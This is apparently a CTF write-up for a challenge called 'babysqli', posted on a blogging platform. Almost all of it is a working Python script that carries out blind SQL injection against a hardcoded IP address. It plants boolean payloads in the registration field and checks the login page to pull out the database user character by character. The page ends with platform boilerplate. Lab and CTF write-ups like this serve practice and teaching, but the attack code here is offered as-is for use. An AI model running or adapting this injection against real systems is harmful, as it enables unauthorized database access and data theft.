babysqli wp

u can use innodb:)

# -*- coding:utf-8 -*- 
import requests
from random import Random
def random_str(randomlength=8):
    str = ''
    chars = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz0123456789'
    length = len(chars) - 1
    random = Random()
    for i in range(randomlength):
        str+=chars[random.randint(0, length)]
    return str
dic='0123456789_@:.abcdefghijklmnopqrstuvwxyz'
url="http://47.98.51.5/vlogin/reg.php"
table_name=''
def register(email,uinfo):
    url="http://47.98.51.5/vlogin/reg.php"
    data={
    "email":email,
    "pass":"123",
    "userinfo":userinfo
    }
    requests.post(url=url,data=data)
def login(loginuser):
    url="http://47.98.51.5/vlogin/login.php"
    a=requests.session()
    data2={
    "loginuser":loginuser,
    "loginpass":"123"
    }
    a.post(url=url,data=data2)
    url3="http://47.98.51.5/vlogin/vpage/index.php"
    b=a.get(url3)
    return b.text
for i in range(1,100):
    for j in dic:
        email=random_str(randomlength=8)+"@1.com"
        userinfo="'or(if(1,(select(substr((select(user())),{},1))='{}'),1)=1)#".format(i,j)
        register(email,userinfo)
        c=login(email)
        if "1.png" in c:
            table_name += j
            print table_name
            break
print table_name
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

友情链接更多精彩内容